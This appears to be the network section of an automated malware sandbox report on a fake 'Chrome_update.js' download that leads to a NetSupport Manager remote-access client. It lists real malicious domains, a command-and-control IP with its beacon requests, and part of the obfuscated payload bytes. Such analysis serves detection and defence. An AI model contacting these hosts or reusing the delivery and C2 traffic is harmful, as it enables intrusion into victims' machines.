                                                          Aug 2, 2023 10:16:25.028460026 CEST53629108.8.8.8192.168.2.6
                                                          Aug 2, 2023 10:16:37.817123890 CEST6386353192.168.2.68.8.8.8
                                                          Aug 2, 2023 10:16:37.856540918 CEST53638638.8.8.8192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Aug 2, 2023 10:16:17.568207026 CEST192.168.2.68.8.8.80x90eaStandard query (0)magydostravel.comA (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:19.943656921 CEST192.168.2.68.8.8.80xebb0Standard query (0)mangoairsoft.comA (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:21.562964916 CEST192.168.2.68.8.8.80xb9f6Standard query (0)mangoairsoft.comA (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:23.040771961 CEST192.168.2.68.8.8.80x253aStandard query (0)mangoairsoft.comA (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:24.943399906 CEST192.168.2.68.8.8.80x198cStandard query (0)mangoairsoft.comA (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:37.817123890 CEST192.168.2.68.8.8.80xd7f6Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Aug 2, 2023 10:16:17.709898949 CEST8.8.8.8192.168.2.60x90eaNo error (0)magydostravel.com185.9.147.166A (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:20.014754057 CEST8.8.8.8192.168.2.60xebb0No error (0)mangoairsoft.com188.127.230.147A (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:21.591770887 CEST8.8.8.8192.168.2.60xb9f6No error (0)mangoairsoft.com188.127.230.147A (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:23.070672989 CEST8.8.8.8192.168.2.60x253aNo error (0)mangoairsoft.com188.127.230.147A (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:25.028460026 CEST8.8.8.8192.168.2.60x198cNo error (0)mangoairsoft.com188.127.230.147A (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:37.856540918 CEST8.8.8.8192.168.2.60xd7f6No error (0)geo.netsupportsoftware.comgeography.netsupportsoftware.comCNAME (Canonical name)IN (0x0001)false
                                                          Aug 2, 2023 10:16:37.856540918 CEST8.8.8.8192.168.2.60xd7f6No error (0)geography.netsupportsoftware.com51.142.119.24A (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:37.856540918 CEST8.8.8.8192.168.2.60xd7f6No error (0)geography.netsupportsoftware.com62.172.138.8A (IP address)IN (0x0001)false
                                                          Aug 2, 2023 10:16:37.856540918 CEST8.8.8.8192.168.2.60xd7f6No error (0)geography.netsupportsoftware.com62.172.138.67A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • magydostravel.com
                                                          • mangoairsoft.com
                                                          • 94.158.247.23connection: keep-alivecmd=pollinfo=1ack=1
                                                          • 94.158.247.23connection: keep-alivecmd=encdes=1data=u2hr4]%y-=id3wi7?=@ff&t[6ral$c=iyg(dhg#rtr5=ifmqyz8=mpiv{r=j=js:x>w~k=n+|*9w_z8a ]
                                                          • 94.158.247.23connection: keep-alivecmd=encdes=1data=l3<(t{evk9|||$(m$ccp]u#1h*l0mtsm6
                                                          • geo.netsupportsoftware.com
                                                          • 94.158.247.23connection: keep-alivecmd=encdes=1data=#mhuaag

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.649705185.9.147.166443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.649706188.127.230.147443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.649707188.127.230.147443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.649708188.127.230.147443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.649709188.127.230.147443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.64971094.158.247.235050C:\ProgramData\client32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Aug 2, 2023 10:16:36.147886038 CEST3810OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 94.158.247.23Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                          Data Raw:
                                                          Data Ascii:
                                                          Aug 2, 2023 10:16:36.321623087 CEST3810INHTTP/1.1 200 OKServer: NetSupport Gateway/1.6 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 60Connection: Keep-AliveCMD=ENCDES=1DATA=g+${ \Wbb)w}oXxf
                                                          Data Raw:
                                                          Data Ascii:
                                                          Aug 2, 2023 10:16:36.788955927 CEST3811OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 236Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr4]%y-=ID3Wi7?=@Ff&t[6raL$C=IYG(dHG#rtr5=IfMQYz8=MPIV{r=J=JS:X>w~k=n+|*9W_z8A ]
                                                          Data Raw:
                                                          Data Ascii:
                                                          Aug 2, 2023 10:16:36.961810112 CEST3811INHTTP/1.1 200 OKServer: NetSupport Gateway/1.6 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 152Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr \WhE=I=n~7s4}X),,Dq,()4]%y-A9H=n :!b<D-Cxs=@'?jRb'h[TjI
                                                          Data Raw:
                                                          Data Ascii:
                                                          Aug 2, 2023 10:16:37.097242117 CEST3812OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 84Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=l3<(T{EVk9|||$(m$CCP]U#1H*L0MtsM6
                                                          Data Raw:
                                                          Data Ascii:
                                                          Aug 2, 2023 10:17:37.295517921 CEST3814OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                          Data Raw:
                                                          Data Ascii:
                                                          Aug 2, 2023 10:18:37.476180077 CEST3815OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                          Data Raw:
                                                          Data Ascii:
                                                          Aug 2, 2023 10:19:37.575835943 CEST3815OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                          Data Raw:
                                                          Data Ascii:


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          6192.168.2.64971151.142.119.2480C:\ProgramData\client32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Aug 2, 2023 10:16:39.272135973 CEST3812OUTGET /location/loca.asp HTTP/1.1
                                                          Host: geo.netsupportsoftware.com
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Aug 2, 2023 10:16:39.398652077 CEST3813INHTTP/1.1 200 OK
                                                          Cache-Control: private
                                                          Content-Type: text/html; Charset=utf-8
                                                          Server: Microsoft-IIS/10.0
                                                          Access-Control-Allow-Origin: *
                                                          Set-Cookie: ASPSESSIONIDACQTCRCQ=NKAKEPOADJCAJKGHOKCPKMLK; path=/
                                                          X-Powered-By: ASP.NET
                                                          X-Frame-Options: SAMEORIGIN
                                                          Date: Wed, 02 Aug 2023 08:16:39 GMT
                                                          Content-Length: 15
                                                          Data Raw: 34 37 2e 31 37 37 32 2c 38 2e 34 32 37 31 39
                                                          Data Ascii: 47.1772,8.42719


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.649705185.9.147.166443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2023-08-02 08:16:18 UTC0OUTGET /cdn/91c818ee6e9ec29f8c1.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                          Host: magydostravel.com
                                                          2023-08-02 08:16:18 UTC0INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 02 Aug 2023 08:16:18 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 799357
                                                          Connection: close
                                                          Content-Description: File Transfer
                                                          Content-Disposition: attachment; filename=Chrome_update.js
                                                          Content-Transfer-Encoding: binary
                                                          Expires: 0
                                                          Cache-Control: must-revalidate
                                                          Pragma: public
                                                          2023-08-02 08:16:18 UTC0INData Raw: 0d 0a 2f 2a 62 6d 47 48 6e 70 6a 53 6b 59 51 49 6c 51 6c 79 48 76 63 52 58 76 52 43 73 59 52 56 42 68 6f 43 48 65 4e 47 62 71 57 62 77 77 57 56 6b 71 49 70 4e 46 6d 78 6a 64 62 73 6b 4e 75 43 41 54 65 4e 70 4c 78 43 4a 45 61 55 43 78 51 6c 72 42 48 6f 58 61 48 6e 78 47 4a 4b 6c 45 61 44 58 6a 71 48 67 48 77 72 69 42 47 4f 5a 6c 5a 72 65 72 55 65 67 66 6c 70 4d 43 4f 55 6d 75 47 58 64 53 73 43 74 47 4a 52 59 7a 4d 74 4d 6c 55 66 5a 52 73 4f 42 51 73 6f 4a 5a 68 65 78 67 6e 51 78 49 45 55 73 69 75 5a 68 5a 46 7a 46 63 77 48 4a 59 69 4c 4b 49 63 6a 41 53 6a 49 54 56 41 72 4b 65 66 41 69 45 6c 45 4b 58 75 73 74 41 44 6e 46 62 51 41 55 76 71 56 67 74 56 6e 4a 4d 54 45 50 76 78 5a 53 73 4e 41 58 69 67 57 7a 51 56 79 69 4a 71 61 6d 72 72 66 55 4f 6f 54 51 63 66
                                                          Data Ascii: /*bmGHnpjSkYQIlQlyHvcRXvRCsYRVBhoCHeNGbqWbwwWVkqIpNFmxjdbskNuCATeNpLxCJEaUCxQlrBHoXaHnxGJKlEaDXjqHgHwriBGOZlZrerUegflpMCOUmuGXdSsCtGJRYzMtMlUfZRsOBQsoJZhexgnQxIEUsiuZhZFzFcwHJYiLKIcjASjITVArKefAiElEKXustADnFbQAUvqVgtVnJMTEPvxZSsNAXigWzQVyiJqamrrfUOoTQcf
                                                          2023-08-02 08:16:18 UTC16INData Raw: 58 6b 55 76 6a 44 50 46 68 52 6f 67 72 4f 45 78 7a 52 50 42 68 62 46 53 70 74 42 6a 4c 6a 43 73 59 67 52 50 6a 47 44 6a 66 79 6f 72 4a 79 57 49 4c 4c 41 65 61 68 49 78 75 4c 49 47 49 59 6f 78 51 70 53 53 42 69 56 4d 6b 4d 56 46 77 6d 64 61 59 4b 4b 4f 44 6e 43 70 6d 42 53 50 66 4c 73 42 4f 44 42 5a 51 4b 4c 48 47 4b 4e 72 4d 66 6b 63 49 67 68 45 64 4d 69 70 43 6f 43 6d 70 62 42 4e 50 6e 44 74 70 74 77 50 72 48 6c 69 72 47 4d 64 50 68 09 52 50 6f 4e 59 5a 62 53 63 50 7a 62 49 74 64 41 76 77 50 56 6e 78 49 53 42 6d 77 4d 59 4a 47 67 4c 52 76 46 59 76 59 45 53 41 49 74 49 45 74 6b 6c 61 55 4b 66 78 74 72 63 58 64 72 54 55 4f 5a 72 76 61 49 55 63 71 52 52 69 67 54 48 73 6d 69 74 44 46 6a 41 69 41 49 45 79 64 47 50 69 45 65 6c 43 48 75 41 68 62 72 75 6d 62 42
                                                          Data Ascii: XkUvjDPFhRogrOExzRPBhbFSptBjLjCsYgRPjGDjfyorJyWILLAeahIxuLIGIYoxQpSSBiVMkMVFwmdaYKKODnCpmBSPfLsBODBZQKLHGKNrMfkcIghEdMipCoCmpbBNPnDtptwPrHlirGMdPhRPoNYZbScPzbItdAvwPVnxISBmwMYJGgLRvFYvYESAItIEtklaUKfxtrcXdrTUOZrvaIUcqRRigTHsmitDFjAiAIEydGPiEelCHuAhbrumbB
                                                          2023-08-02 08:16:18 UTC32INData Raw: 45 69 6e 51 45 78 56 7a 4d 67 53 4c 54 65 41 47 5a 48 48 6f 51 4c 44 75 6a 70 6e 4f 48 5a 44 6b 59 67 75 72 5a 4c 45 61 68 59 4d 61 68 66 64 42 68 4d 4a 4d 6e 65 61 52 6b 66 71 64 6a 4b 79 57 43 73 56 70 5a 67 53 53 53 6d 68 53 79 53 42 78 6e 69 6b 43 49 43 56 66 53 69 55 50 46 44 6a 51 61 63 4f 43 49 6c 43 7a 77 56 78 6a 59 69 6b 59 55 53 6d 59 51 51 72 45 51 4b 52 7a 4a 45 5a 61 56 72 4e 61 7a 57 6b 58 57 47 66 45 75 59 47 72 6b 45 43 4c 45 46 55 59 69 4a 48 69 56 7a 57 6b 48 76 47 43 69 65 4e 63 65 5a 47 6c 79 77 6d 4d 6f 46 4c 4e 58 4b 49 6d 6c 44 6f 63 5a 4b 65 56 6e 4c 7a 75 43 6a 6d 73 42 4e 55 49 53 50 65 65 77 58 4c 7a 64 6d 79 46 76 6f 76 48 6e 4b 52 65 78 45 49 74 4c 48 62 6b 50 74 4e 4b 61 53 4a 6b 5a 78 6d 79 66 4d 4d 69 50 6b 76 4b 47 47 56
                                                          Data Ascii: EinQExVzMgSLTeAGZHHoQLDujpnOHZDkYgurZLEahYMahfdBhMJMneaRkfqdjKyWCsVpZgSSSmhSySBxnikCICVfSiUPFDjQacOCIlCzwVxjYikYUSmYQQrEQKRzJEZaVrNazWkXWGfEuYGrkECLEFUYiJHiVzWkHvGCieNceZGlywmMoFLNXKImlDocZKeVnLzuCjmsBNUISPeewXLzdmyFvovHnKRexEItLHbkPtNKaSJkZxmyfMMiPkvKGGV
                                                          2023-08-02 08:16:18 UTC48INData Raw: 51 45 45 56 44 52 4b 4e 4c 56 50 63 4a 55 4d 78 48 66 66 6c 55 4e 44 45 66 67 61 46 44 6c 69 6a 4d 6c 4b 50 74 76 44 69 61 7a 66 4e 6e 57 43 6f 48 6d 58 49 41 44 46 6e 4d 6c 6d 68 54 56 61 63 58 70 44 45 6b 50 6a 65 61 70 7a 4d 50 6a 6d 42 5a 77 4d 50 6e 6d 42 4d 47 59 75 6d 45 4e 4b 5a 52 45 59 54 4c 50 57 72 5a 66 4b 46 7a 65 73 73 53 53 43 4c 71 42 79 6c 42 6a 73 6d 4b 72 48 56 45 4b 58 47 61 52 6f 66 4d 4c 73 42 56 6a 47 54 52 50 42 51 47 56 73 6e 4f 68 64 58 58 43 71 69 64 4f 44 69 4c 4b 59 71 74 42 76 7a 72 42 69 51 57 53 78 70 71 56 64 43 72 49 73 65 73 50 44 56 45 6b 61 4a 67 52 41 77 4b 42 79 41 52 63 72 50 6f 56 41 4b 79 6b 6a 71 42 54 67 65 75 62 6c 73 6d 46 51 54 68 78 65 41 42 4e 74 64 65 54 76 43 69 50 74 43 4b 6e 51 71 63 69 6d 41 7a 6b 49
                                                          Data Ascii: QEEVDRKNLVPcJUMxHfflUNDEfgaFDlijMlKPtvDiazfNnWCoHmXIADFnMlmhTVacXpDEkPjeapzMPjmBZwMPnmBMGYumENKZREYTLPWrZfKFzessSSCLqBylBjsmKrHVEKXGaRofMLsBVjGTRPBQGVsnOhdXXCqidODiLKYqtBvzrBiQWSxpqVdCrIsesPDVEkaJgRAwKByARcrPoVAKykjqBTgeublsmFQThxeABNtdeTvCiPtCKnQqcimAzkI
                                                          2023-08-02 08:16:18 UTC64INData Raw: 57 67 70 54 4e 6a 45 61 50 6b 55 42 4b 50 41 6e 53 4a 65 6c 4f 52 49 59 45 69 54 6c 54 73 6f 63 64 4d 4e 62 50 64 46 6d 52 57 57 68 74 4f 73 6e 65 46 73 48 55 57 4a 7a 42 64 69 62 6e 57 4a 50 45 51 47 45 43 42 51 73 42 6d 41 4d 54 4b 61 6d 6b 52 66 56 52 48 69 50 6b 45 6b 5a 67 63 52 48 69 58 61 6c 50 46 76 4f 4a 62 6e 58 46 75 6a 68 6a 4b 57 6d 4d 65 56 79 71 7a 67 64 44 44 66 56 71 4c 6b 49 68 52 70 51 48 55 6f 74 68 6f 44 70 54 43 56 62 64 76 54 51 65 79 69 47 7a 47 79 52 78 67 6c 75 74 4e 41 4d 48 6b 74 55 79 78 45 72 7a 62 55 77 71 6a 6b 4c 43 56 56 6d 54 55 50 73 71 6e 5a 55 6b 5a 48 57 66 6c 4e 44 63 6a 66 50 50 46 52 4b 71 41 6a 63 57 4a 61 79 49 6b 66 66 49 52 45 79 70 73 54 46 57 4a 62 72 57 71 7a 43 77 72 64 44 69 76 5a 76 77 57 5a 64 77 55 76
                                                          Data Ascii: WgpTNjEaPkUBKPAnSJelORIYEiTlTsocdMNbPdFmRWWhtOsneFsHUWJzBdibnWJPEQGECBQsBmAMTKamkRfVRHiPkEkZgcRHiXalPFvOJbnXFujhjKWmMeVyqzgdDDfVqLkIhRpQHUothoDpTCVbdvTQeyiGzGyRxglutNAMHktUyxErzbUwqjkLCVVmTUPsqnZUkZHWflNDcjfPPFRKqAjcWJayIkffIREypsTFWJbrWqzCwrdDivZvwWZdwUv
                                                          2023-08-02 08:16:18 UTC80INData Raw: 47 59 63 73 77 4e 43 69 6f 62 4c 5a 70 75 56 63 4b 77 73 7a 4d 49 49 4c 74 4d 50 57 48 57 6c 4c 4a 69 62 56 42 78 4a 45 74 53 44 61 4e 57 61 53 5a 6f 4c 45 6c 65 49 6e 6d 55 54 42 46 42 69 76 72 78 6f 66 50 4c 69 7a 4d 4a 56 62 78 57 73 4d 6d 59 75 6e 57 6d 76 75 71 47 72 63 67 70 71 6c 53 70 55 6b 45 76 6e 46 65 48 6b 67 67 69 51 77 4f 46 56 44 58 6a 6d 4c 62 77 67 6e 59 71 56 61 48 45 47 62 41 58 69 41 6e 41 7a 65 6a 7a 76 6c 6e 57 6a 6f 49 56 78 47 68 6c 51 67 73 74 68 5a 62 6c 48 74 76 63 6d 56 44 61 78 61 76 66 4d 63 64 75 68 44 4e 42 4c 4a 4c 4e 61 50 49 6a 77 46 58 68 47 59 63 65 57 62 70 63 62 74 74 6b 65 76 75 6a 6c 4d 53 4a 74 4c 67 62 49 73 42 66 6f 58 6f 76 68 72 5a 58 4c 74 69 52 66 48 50 50 67 48 51 6a 72 6b 65 7a 75 45 56 75 65 76 43 64 76
                                                          Data Ascii: GYcswNCiobLZpuVcKwszMIILtMPWHWlLJibVBxJEtSDaNWaSZoLEleInmUTBFBivrxofPLizMJVbxWsMmYunWmvuqGrcgpqlSpUkEvnFeHkggiQwOFVDXjmLbwgnYqVaHEGbAXiAnAzejzvlnWjoIVxGhlQgsthZblHtvcmVDaxavfMcduhDNBLJLNaPIjwFXhGYceWbpcbttkevujlMSJtLgbIsBfoXovhrZXLtiRfHPPgHQjrkezuEVuevCdv
                                                          2023-08-02 08:16:18 UTC96INData Raw: 62 57 68 41 44 7a 69 4b 6b 6b 4b 57 61 4e 47 59 4e 68 43 57 4f 4f 76 52 51 46 72 44 4f 76 6a 71 51 4f 64 78 7a 73 45 46 69 4b 74 4f 55 50 53 6c 45 6f 6a 4b 41 66 77 66 7a 4a 4a 61 79 69 46 75 69 71 43 56 7a 77 51 78 4d 50 51 72 77 6a 6c 42 72 74 49 4f 42 6b 54 51 4f 79 46 48 50 62 55 44 43 76 69 50 77 7a 6b 6d 74 67 68 6a 75 4e 58 42 46 46 68 6e 64 44 53 78 67 59 77 6a 6c 79 4f 54 48 53 66 6c 7a 7a 4e 6f 77 57 61 68 49 42 74 62 7a 4e 70 65 68 57 46 67 4d 67 68 44 43 43 4b 64 4d 6c 6f 44 54 57 72 56 5a 61 68 4a 67 49 52 6f 57 6c 46 73 59 41 67 77 46 64 5a 4b 43 71 51 78 51 6d 6b 64 4e 78 77 43 4e 69 70 4f 79 66 51 51 72 71 59 57 43 6f 62 48 44 45 66 4e 61 58 69 45 7a 52 51 57 59 4b 43 56 75 77 6d 4e 64 6a 55 76 6b 45 67 72 57 6c 53 78 6c 6f 65 68 77 55 42
                                                          Data Ascii: bWhADziKkkKWaNGYNhCWOOvRQFrDOvjqQOdxzsEFiKtOUPSlEojKAfwfzJJayiFuiqCVzwQxMPQrwjlBrtIOBkTQOyFHPbUDCviPwzkmtghjuNXBFFhndDSxgYwjlyOTHSflzzNowWahIBtbzNpehWFgMghDCCKdMloDTWrVZahJgIRoWlFsYAgwFdZKCqQxQmkdNxwCNipOyfQQrqYWCobHDEfNaXiEzRQWYKCVuwmNdjUvkEgrWlSxloehwUB
                                                          2023-08-02 08:16:18 UTC112INData Raw: 67 6b 46 67 5a 4c 4e 74 74 5a 63 44 79 69 45 63 43 70 55 69 46 4c 56 59 6a 69 74 48 45 6e 6d 68 4e 43 70 75 42 50 61 67 6f 56 4a 57 75 51 6a 57 78 4d 4b 5a 4b 70 65 5a 55 49 4e 57 67 59 53 63 41 6e 78 6b 6b 6e 59 71 4c 49 55 55 79 58 41 44 54 51 79 54 75 41 77 73 4a 52 69 74 78 62 73 74 4d 41 48 61 79 67 69 51 52 56 55 73 73 44 43 57 55 46 51 76 43 58 6d 6d 66 53 46 53 45 4f 53 65 46 56 79 7a 69 58 57 74 71 41 76 50 5a 74 73 65 56 62 67 73 6a 73 6d 6a 47 6e 68 68 48 49 6a 48 65 53 76 4e 44 76 62 64 6b 67 65 58 4f 61 61 6d 6b 58 6d 63 55 63 70 66 57 66 66 64 54 76 41 4e 59 50 5a 63 41 45 54 73 75 53 76 48 66 66 78 66 75 59 77 54 53 45 6b 72 6e 50 4f 6f 58 4c 68 68 72 59 65 68 76 47 43 7a 7a 4f 54 48 72 6b 64 4b 50 72 66 75 49 52 6f 56 50 6e 67 67 55 79 66
                                                          Data Ascii: gkFgZLNttZcDyiEcCpUiFLVYjitHEnmhNCpuBPagoVJWuQjWxMKZKpeZUINWgYScAnxkknYqLIUUyXADTQyTuAwsJRitxbstMAHaygiQRVUssDCWUFQvCXmmfSFSEOSeFVyziXWtqAvPZtseVbgsjsmjGnhhHIjHeSvNDvbdkgeXOaamkXmcUcpfWffdTvANYPZcAETsuSvHffxfuYwTSEkrnPOoXLhhrYehvGCzzOTHrkdKPrfuIRoVPnggUyf
                                                          2023-08-02 08:16:18 UTC128INData Raw: 68 77 4a 58 5a 52 70 64 43 4e 4c 75 72 67 4c 53 4e 54 61 55 4f 6b 6d 57 77 64 72 6e 57 62 42 74 67 52 4f 6e 51 69 65 6d 51 71 45 44 70 6e 53 75 65 6f 5a 50 49 4a 76 47 43 68 73 5a 6d 58 50 68 43 73 75 63 70 59 53 71 74 73 6b 42 63 6a 49 63 70 77 6e 65 4c 59 6d 53 73 73 46 52 4a 68 6e 4d 4d 59 64 79 54 71 73 75 50 44 42 66 64 4e 53 4a 6c 7a 4b 59 68 58 42 62 43 5a 78 72 79 49 6e 76 66 61 52 75 73 68 56 48 6a 66 41 6f 6a 70 69 71 4f 41 4b 4b 55 64 67 56 6a 44 6c 63 42 48 4a 44 63 59 77 4b 46 78 59 74 58 71 68 42 79 78 69 70 4c 71 57 4d 4b 59 65 52 5a 70 53 51 73 78 45 77 4f 45 72 6a 41 6a 4e 4e 72 71 53 4e 65 57 42 58 7a 4b 6a 4e 4d 48 74 77 55 50 62 45 75 43 41 70 4b 73 46 4f 65 4b 72 52 59 72 61 69 57 6b 66 42 70 68 79 41 51 53 50 59 6f 53 68 66 4b 52 4c
                                                          Data Ascii: hwJXZRpdCNLurgLSNTaUOkmWwdrnWbBtgROnQiemQqEDpnSueoZPIJvGChsZmXPhCsucpYSqtskBcjIcpwneLYmSssFRJhnMMYdyTqsuPDBfdNSJlzKYhXBbCZxryInvfaRushVHjfAojpiqOAKKUdgVjDlcBHJDcYwKFxYtXqhByxipLqWMKYeRZpSQsxEwOErjAjNNrqSNeWBXzKjNMHtwUPbEuCApKsFOeKrRYraiWkfBphyAQSPYoShfKRL
                                                          2023-08-02 08:16:18 UTC144INData Raw: 54 44 65 7a 73 6b 65 52 55 48 64 5a 4e 6d 66 4a 63 53 70 48 55 66 74 6e 62 4c 65 76 50 65 44 4e 61 49 4b 51 65 46 4b 6d 71 77 51 74 66 45 51 55 4e 75 6a 48 63 57 4b 53 41 79 6a 57 42 58 49 79 42 49 49 5a 59 75 5a 74 50 57 48 55 68 63 68 54 77 78 65 43 66 59 75 66 6a 4b 4f 42 46 46 6f 4e 44 62 56 67 70 6e 4e 73 69 79 4b 79 51 7a 64 73 6a 6f 6d 4f 62 6c 71 68 59 41 6c 4e 45 68 55 78 4d 6e 65 42 44 4d 7a 69 6e 56 48 62 48 47 4a 49 77 49 48 67 46 57 41 7a 51 6b 66 6b 47 46 71 6a 6f 47 71 47 72 4b 51 4d 50 48 56 67 69 57 5a 71 44 61 42 4c 71 4c 45 4d 70 54 79 5a 68 4d 6d 5a 63 6b 4c 70 75 6b 55 6f 75 73 54 73 68 6e 42 77 70 53 4e 74 64 74 53 76 50 79 6b 69 52 70 72 63 79 44 62 76 56 72 78 56 48 52 4d 4b 41 57 44 4d 74 6d 77 62 75 52 69 62 4e 76 77 57 6a 72 70
                                                          Data Ascii: TDezskeRUHdZNmfJcSpHUftnbLevPeDNaIKQeFKmqwQtfEQUNujHcWKSAyjWBXIyBIIZYuZtPWHUhchTwxeCfYufjKOBFFoNDbVgpnNsiyKyQzdsjomOblqhYAlNEhUxMneBDMzinVHbHGJIwIHgFWAzQkfkGFqjoGqGrKQMPHVgiWZqDaBLqLEMpTyZhMmZckLpukUousTshnBwpSNtdtSvPykiRprcyDbvVrxVHRMKAWDMtmwbuRibNvwWjrp
                                                          2023-08-02 08:16:18 UTC160INData Raw: 72 55 6b 72 64 7a 43 6a 6f 73 56 42 4f 52 58 75 63 42 6c 61 4c 66 6f 57 49 66 72 6b 51 77 78 7a 6e 42 51 53 4a 59 77 50 73 50 51 75 68 43 44 6b 70 67 72 6d 6a 5a 6f 62 6c 69 67 4e 46 4c 49 6d 6a 62 4d 6f 50 64 63 79 65 4f 72 6d 45 64 47 46 66 50 77 43 46 4a 47 6c 71 4a 62 44 54 65 45 63 6e 4a 51 43 6c 67 62 46 6e 42 41 51 73 6b 6b 59 6b 53 61 6d 71 4f 67 66 46 6e 50 55 6d 67 45 55 75 6e 57 6f 4c 58 68 64 4d 74 65 4d 4f 67 54 76 59 58 66 72 51 53 49 6f 71 55 68 48 68 44 79 6a 4a 75 41 6f 75 4f 79 59 4c 49 47 6a 71 52 64 44 49 71 61 61 48 56 72 71 74 48 58 61 42 69 50 62 66 68 4a 49 63 53 4b 4e 64 55 53 48 49 5a 42 75 5a 56 71 6f 46 50 62 67 65 49 77 45 48 42 43 48 50 68 4f 45 4f 55 74 54 4e 4e 54 47 4f 52 6e 6a 5a 6d 72 4d 47 73 7a 6b 59 53 47 42 55 59 78
                                                          Data Ascii: rUkrdzCjosVBORXucBlaLfoWIfrkQwxznBQSJYwPsPQuhCDkpgrmjZobligNFLImjbMoPdcyeOrmEdGFfPwCFJGlqJbDTeEcnJQClgbFnBAQskkYkSamqOgfFnPUmgEUunWoLXhdMteMOgTvYXfrQSIoqUhHhDyjJuAouOyYLIGjqRdDIqaaHVrqtHXaBiPbfhJIcSKNdUSHIZBuZVqoFPbgeIwEHBCHPhOEOUtTNNTGORnjZmrMGszkYSGBUYx
                                                          2023-08-02 08:16:18 UTC176INData Raw: 4d 74 49 4c 6e 71 48 69 4b 76 66 66 6f 41 68 54 55 44 57 6e 4a 62 44 52 57 44 61 71 71 73 6e 4d 51 73 4c 45 55 5a 78 6a 7a 72 42 7a 6b 42 72 42 74 57 6c 70 6f 66 4b 73 76 5a 62 6a 6b 6a 70 73 56 46 52 59 71 74 41 4c 77 56 6a 52 6f 73 73 65 6e 54 56 53 65 64 41 6d 6d 48 61 6d 6f 63 64 57 55 41 52 4f 42 72 68 74 75 52 76 6e 6e 46 62 79 69 6e 49 41 76 65 65 6f 51 4f 58 71 4b 76 49 41 4e 75 5a 44 7a 6b 76 62 53 6d 51 4a 77 41 6b 52 57 65 46 41 47 4f 50 74 67 73 57 6b 6f 6a 56 4c 59 56 73 6a 6b 59 54 66 54 67 69 4d 74 54 6d 4c 66 5a 44 65 74 47 6f 6a 6e 6d 48 6f 70 7a 5a 45 4b 6b 4f 71 54 4d 4a 58 74 4e 50 42 78 54 78 6f 6d 66 62 43 45 72 57 4e 71 4c 67 61 42 4d 56 52 48 6f 44 6b 7a 6c 64 4c 6e 4a 65 48 6c 46 72 6f 69 68 4c 7a 75 69 45 63 5a 71 70 55 56 6c 76
